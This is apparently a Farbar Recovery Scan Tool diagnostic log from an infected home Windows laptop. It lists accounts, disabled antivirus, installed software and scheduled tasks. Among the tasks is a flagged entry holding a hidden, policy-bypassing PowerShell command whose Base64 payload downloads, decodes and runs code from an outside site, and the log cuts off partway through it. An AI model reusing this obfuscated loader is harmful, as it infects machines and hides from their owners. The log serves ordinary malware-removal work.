Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015 Ran by archer (2016-01-01 12:01:22) Running from C:\Users\archer\Desktop Windows 8.1 (X64) (2014-12-28 20:00:10) Boot Mode: Normal ========================================================== ==================== Accounts: ============================= Administrator (S-1-5-21-4067499190-4158452651-832932472-500 - Administrator - Disabled) archer (S-1-5-21-4067499190-4158452651-832932472-1001 - Administrator - Enabled) => C:\Users\archer Guest (S-1-5-21-4067499190-4158452651-832932472-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-4067499190-4158452651-832932472-1003 - Limited - Enabled) joseph.fernandez (S-1-5-21-4067499190-4158452651-832932472-1005 - Limited - Enabled) => C:\Users\joseph.fernandez melanie.fernandez (S-1-5-21-4067499190-4158452651-832932472-1004 - Limited - Enabled) ==================== Security Center ======================== (If an entry is included in the fixlist, it will be removed.) AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AV: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {DA9F8ED0-D0DE-39CC-F55A-51AB4CC1B556} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: McAfee Anti-Virus and Anti-Spyware (Disabled - Up to date) {61FE6F34-F6E4-3642-CFEA-6AD93746FFEB} FW: McAfee Firewall (Disabled) {E2A40FF5-9AB1-3894-DE05-F89EB212F22D} ==================== Installed Programs ====================== (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.) µTorrent (HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\uTorrent) (Version: 3.4.5.41202 - BitTorrent Inc.) 64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.008.20082 - Adobe Systems Incorporated) Adobe Flash Player 20 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 20.0.0.235 - Adobe Systems Incorporated) AIO_Scan (x32 Version: 130.0.421.000 - Hewlett-Packard) Hidden BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix) Citrix Receiver (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.2.0.10 - Citrix Systems, Inc.) Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden CyberLink PhotoDirector 3 (HKLM-x32\...\InstallShield_{39337565-330E-4ab6-A9AE-AC81E0720B10}) (Version: 3.0.1.4107 - CyberLink Corp.) DeAlExpreSs (HKLM-x32\...\{25F259ED-12F6-429F-5783-527C3E2F8586}) (Version: - ) <==== ATTENTION Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden DJ_AIO_NS_LP_DocCD (x32 Version: 90.0.222.000 - Hewlett-Packard) Hidden DJ_AIO_ProductContext (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden DJ_AIO_Software (x32 Version: 140.0.428.000 - Hewlett-Packard) Hidden DJ_AIO_Software_min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.3.2.2 - Dolby Laboratories Inc) Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.0.31 - Lenovo) Energy Manager (x32 Version: 1.0.0.31 - Lenovo) Hidden F4100 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden F4100_Help (x32 Version: 90.0.222.000 - Hewlett-Packard) Hidden Genesys USB Mass Storage Device (HKLM-x32\...\{959B7F35-2819-40C5-A0CD-3C53B5FCC935}) (Version: 4.3.0.7 - Genesys Logic) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.106 - Google Inc.) Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP) HP Deskjet All-In-One Software (HKLM\...\{2CB8566A-8EA6-417A-BAB1-1B10A88C79BB}) (Version: 14.0 - HP) HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP) HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife) HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP) HP Support Solutions Framework (HKLM-x32\...\{FC3C2B77-6800-48C6-A15D-9D1031130C16}) (Version: 11.51.0049 - Hewlett-Packard Company) HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard) HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3345 - Intel Corporation) Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.5.1000 - Intel Corporation) Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation) Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10240 - Realtek Semiconductor Corp.) Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.) Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden Lenovo Photos (HKLM-x32\...\Lenovo Photos) (Version: 4.8.5 - CEWE COLOR AG u Co. OHG) Lenovo PowerDVD10 (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5630.52 - CyberLink Corp.) Lenovo PowerDVD10 (x32 Version: 10.0.5630.52 - CyberLink Corp.) Hidden Lenovo Reach (HKLM-x32\...\{0B5E0E89-4BCA-4035-BBA1-D1439724B6E2}) (Version: 1.1.0.166 - Stoneware, Inc.) Lenovo VeriFace (HKLM\...\Lenovo VeriFace) (Version: 5.0.13.5261 - Lenovo) Malwarebytes Anti-Malware version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes) MarketResearch (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden Maxthon Cloud Browser (HKLM-x32\...\Maxthon3) (Version: 4.1.2.4000 - Maxthon International Limited) McAfee Internet Security (HKLM-x32\...\MSC) (Version: 13.6.1529 - McAfee, Inc.) McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.11.266.3 - McAfee, Inc.) McAfee SiteAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 3.7.194 - McAfee, Inc.) Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation) Microsoft Office Home and Student 2013 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 15.0.4779.1002 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-4067499190-4158452651-832932472-1001\...\OneDriveSetup.exe) (Version: 17.3.6281.1202 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{6AFCA4E1-9B78-3640-8F72-A7BF33448200}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Mozilla Firefox 43.0.2 (x86 en-GB) (HKLM-x32\...\Mozilla Firefox 43.0.2 (x86 en-GB)) (Version: 43.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 43.0.2.5833 - Mozilla) OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP) Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4727.1003 - Microsoft Corporation) Hidden Office 15 Click-to-Run Licensing Component (Version: 15.0.4727.1003 - Microsoft Corporation) Hidden Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4727.1003 - Microsoft Corporation) Hidden Online Plug-in (x32 Version: 14.2.0.10 - Citrix Systems, Inc.) Hidden Power2Go (HKLM-x32\...\{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 5.6.0.10525 - CyberLink Corp.) Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.305 - Qualcomm Atheros Communications) Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros) Qualcomm Atheros Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 2.1.0.21 - Qualcomm Atheros Inc.) Rapport (x32 Version: 3.5.1507.99 - Trusteer) Hidden Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7037 - Realtek Semiconductor Corp.) Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden Self-service Plug-in (x32 Version: 4.2.0.2495 - Citrix Systems, Inc.) Hidden SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden StudioTax 2014 (HKLM-x32\...\{1F0B4BC7-3238-4A02-93F7-4132AD435FFD}) (Version: 10.0.2.0 - BHOK IT Consulting) Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 17.0.18.0 - Synaptics Incorporated) Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1507.99 - Trusteer) UnloadSupport (x32 Version: 11.0.0 - Hewlett-Packard) Hidden UserGuide (HKLM-x32\...\InstallShield_{F07C2CF8-4C53-4EC3-8162-A6221E36EB88}) (Version: 1.0.0.15 - Lenovo) UserGuide (x32 Version: 1.0.0.15 - Lenovo) Hidden WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden Windows Driver Package - Lenovo (ACPIVPC) System (02/17/2013 9.52.0.776) (HKLM\...\35DD26BE48DAF4A9F35F969F3CB1E3E1435E661E) (Version: 02/17/2013 9.52.0.776 - Lenovo) Windows Driver Package - Lenovo (WUDFRd) LenovoVhid (07/25/2013 10.30.0.288) (HKLM\...\6BCA401E9CBEED970D75F55FA5320F60D11984E9) (Version: 07/25/2013 10.30.0.288 - Lenovo) ==================== Custom CLSID (Whitelisted): ========================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== Scheduled Tasks (Whitelisted) ============= (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) Task: {05731A67-E7AB-4958-9858-49C4B49A5DD5} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-15] (Google Inc.) Task: {09E86AA9-B994-41AC-94A1-8930AC867792} - System32\Tasks\PDVDServ Task => C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE [2013-03-08] (CyberLink Corp.) Task: {2C85D2D2-CA9F-456D-AD71-4F4369BD1A6B} - System32\Tasks\VoiceBook => c:\programdata\{53c11841-cfcc-3f4a-53c1-11841cfc6107}\blackhat+%282015%29+%5b1080p%5d.exe <==== ATTENTION Task: {3959C21C-7347-4BD6-9B0B-E53839FFF249} - \Superclean -> No File <==== ATTENTION Task: {4CF9BB19-1551-43DB-935A-93DC83991BD0} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation) Task: {5FE15D7E-8799-4FD3-BB8F-8B8A8494030D} - System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-4067499190-4158452651-832932472-1001 => C:\Users\archer\AppData\Local\Microsoft\OneDrive\OneDrive.exe [2015-12-11] (Microsoft Corporation) Task: {6587BA50-D911-4F40-8783-BBD1EC78BAC0} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-15] (Google Inc.) Task: {751E9581-8112-4207-ACD7-7D28296DAF14} - System32\Tasks\Synaptics TouchPad Enhancements => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2013-10-10] (Synaptics Incorporated) Task: {95C69000-88C2-493A-8071-75808445C52B} - System32\Tasks\UMonitor Task => C:\windows\SysWOW64\UMonit64.exe [2013-08-05] () Task: {A0073F3B-4F83-424B-A76C-038B927AB3CD} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\mxup.exe [2013-08-01] (Maxthon International ltd.) Task: {BA48FCCD-F364-42BF-B684-E7B4DCC4D3D1} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto Task: {D3D31C1B-5E1A-4B02-A9C6-A34C76D24621} - System32\Tasks\Microsoft\Office\Office Subscription Maintenance => C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonx86\Microsoft Shared\OFFICE15\OLicenseHeartbeat.exe [2015-12-15] (Microsoft Corporation) Task: {E7572325-D375-4BA9-A622-9074B9AE0A78} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Microsoft Office 15\ClientX64\OfficeC2RClient.exe [2015-10-13] (Microsoft Corporation) Task: {EC790E4E-B845-47F2-AF93-507122431F19} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated) Task: {EF83657C-EF9E-4218-82A9-05747B10DB28} - System32\Tasks\{491A6DCB-2E1E-ACCF-813E-678E06910CAF} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAHMAcABvAHIAdABuAGUAdwAuAG4AZQB0AC8AdQAvAD8AcQA9AG4AaQB3AGQASQBjAGMANgBkAHUAYwB3ADAATwBQAEcAeAA1AGcAYgA3AHIAdwBaAFgARgBYAEoAMABMAHYAbwBDAHEAWgA0AE8AQgBNAFMAeABtAEQAawBuAGYAZABUAHQAZwBwAG0AYwBIAGkAawB5AFgAVABQAGEAMwBMAFMAcQBpAHEAUwBLAGMATgBJAFAAUwBvAC0AYwBZADkALQBEAEMAUgBCAFgAawBmAHUARABWAGgAQwBSAGQAUgBLAHMASgA0AGsAZAAzAHQAVgBYADcAVAA5AHIAMgA3AGkAVgBXADIASgBlAFAAOQBFAFIANQBKAGgATQB5AGcASABoAHcATgBQAEkANgBfAEgANQBFAEgAcwBrAFIAUQBCAGcAdQBmADgATgBZAEcATABYAFYATQBMAHoAQQA5AFcAagBlAGwASwB2AGwANgBqAGwAQgBaAGgAcABVADEAOAB6ADIAZwByAEYASABXAFMAOAB6AGEASgB0AHgAUgB4AEQAZwBzAHMAcABNAEIAVwAxAEcAUQBCAEQANwBMADAAMABIAE8AUgBXAHcAbQBxAFEAZgBuAE0AbgBvAEQATwBDAEgAdQBzAHIAawBlAGwAQgBLAFUAaQBxAEkAMwBaAFoAeABUAHQAUwBNAE8AZgBvAGEAWgB2AEQAaQBZAGcASwAzAFgAWgBMAG8ARgBDAFMAYgAzADYAcAAtAG4AQwBIAGwAYQBsADQAMQBRAEgAbQBwAGcAWgB2AGkAQgByAGIANQBLAGkAVgBZAFcARQBqADkASwBYAG0ANQBJAHAAWABYAFEAWABhAEQANwBtAGwAQQB6AGkANwBYAE0AWQB3AEYAdQB2AGcAYwBvAHYAOABWAHYAUQBLAEYAUgB3AE4AbQBOAEoAdQBFAEYANgBhADQAOAAyAHUASQBVAFkASgAtAEMAcQBWAEwARgAxADcATwBuAG8AbABRAEcAWgBTAF8ARwBkAHIAQgBfAFkAbgAxAHkAVgBuAGcAVgBuADMAcABvAHMAbwBOADMAegB0AGoAdwA3AG4ASQA4AE4AMwB3AHEANQBmAHAAaQBZAGMANwA5AEgAXwBWAFcAcAA4AE0ANgBnAEUAOAB2ADIAQwBCAFYAUwBLAGQANwBhAHEAcAA2AGQAdgBBAG0ANABsAGQAWgA0AHkAMgBPADMAcwA5AFQAVABkAFAAaQBXADcAQQBzAF8ANAAyAEUAcABtAHUAUwBHAEQAcgAmAGMAPQBvAHEAegB3AFQAOABoADgAMAB0AG4ARgBQAFQAawBxAFIAQwBCAHkAVQB1AE4AegA3AHIAOQB6AEgAVwBVAG4ANAA3AFEAZAA5AF8ANQBNAEoASwBxAGcAQwBOAGgAQwBUAEsARABXADkAcQBnAEIAdQBjAHIAeQBvAC0AZwBIAEwAeAA0AGsASwBNAEQAUQBxAGsAdwBQAHgATwA5AGsAWAA3AHEATgBUAGMASABvAEQAeABNAC0AdwBtAFIATQBNAHYATQA5AGoAZABwAHEASQBFAHUATABJAHMALQBaAFQAUABCAGsAZwBkAFMAYwBZAG8AbQB3AF8AeABXAFkAMgBHAHoATwBqAEEAeABkADkANwBHAEwAZgBOAGkARgB6AEgAUABwAGcAVQBLAGEANQBoAEgAMAA5AHUAegBLAEgAXwBWAGIALQBYAHEARwBJAGYANgBLAFIAXwA1AGoANwBBADUAQgBOAEIAUgBtAGUAVgBtADIAWAAtAEcAawBPAHIAWQBOAHcAbwA1AFAASwB4AEwAaABHAEgAMQAzADAANwBHAEcAbQBZAE4AWgBEAGUATwBFAFkARQBkAGEAdQB1ADUAcAB0AGYALQBkAEUAYQBRAFgAeQB1AHMAVQBIAHoATgBKAGMANgBDAGQASQBZAEEASABrAEYAZABxAGcANQA1AFkAbQBGADUAWQBsAHgAaQBYAGQANgBwADgAWgBKAEsAUgBtAEgAYQBZAFQAMQA5AFkAMAB1AFAAawBVAEcAaQBRAG4ASgBCAFEAbQBOADkALQA3AEsASgA0AHUANgB4AEcARgBZAC0AMwBUAEMAbQB3AEYAVwAxAGsAWABiAG4ASQBPAGYAQwBoAHkAQwBGADkAcABzAFIAOABpADgASwAyAC0AawBxADcAYgBjAFIAdwBPADAARgBpAGMAaQBtAF8ATgAxAEQAMQBZAEgAUQAwAEMARwBPAE4ASwBXAGUAZQB2AEQAOABOAG4AbABSAHIAZwBBAFQAUwBGAFMAeQB5ADgAcAB5AFcAMwBaAF8AVABBAEkANgA1ADEANwB3AGYAQQA1AEUAdQBiAGIAVQA0AEEASwBnAGQAaQBuAFoATwBTAE4AegAtAHkAeQAyADEAeQA1AEMANAA0AHAAagBuADIAVQBCAE4AZwBiAGgAbwA1AG0ASQA1AHoAaABjAGYAYQA4AGMAbAB2AHYAagB0ADkANgBlAGYAbgBvAEQATQBLAFAAMgBlAG0AagBPAEgANgB0AGwAZABFAF8AawA5ADkARwAtAE0AdwBJAEEAaABoAGMAYgA3AE0ANwA5AFIANABPADkASwBSAFUAZgBtAFIAUABQAGsAdQBlAFgANgBMADIAUAB0ADcAMQBVADAAaABpAEMANwBhAFYASQBPAGMAaQBEAG8AdQBsAHgAcwBUAFcAMAB2ADcAcwBDAHQAcQBkAG8AWAB6AEUARwBPAHUATABtAEMAVwBkAHoAWgBaAFcAbwBJAEQASwB3ADYATABNAEUAQQA2ADkAMwBCAFMAaQBiAHMAbwBaAFIAcABrAG4AVQA2AG0AZgBXAFIAVQBZAFQAXwBQAHUAMwAzAHoAQgB6ADIAVAB5AGcAcwBRAGUAVAByAEwAcABSAG4AZQBJAFkASgBRAFkAYgBBAEcAYwBpAGQAcAA3ADAAbQBnADQAbABPAGwANABLAFIAVQBmADcAMABjAGYANQBNAGgARABRAEYAYwBiAHEAQQBEAEgALQBrAFAAZQBDAE0AVgBXAEsAbQBqAFgAJgByAD0ANQA5ADgANwA2ADUAMAA3ADcANgA2ADMAOAAxADMANgA5ADQANgAiADsAJABzAHQAcwBrAD0AIgB7ADQAOQAxAEEANgBEAEMAQgAtADIARQAxAEUALQBBAEMAQwBGAC0AOAAxADMARQAtADYANwA4AEUAMAA2ADkAMQAwAEMAQQBGAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AG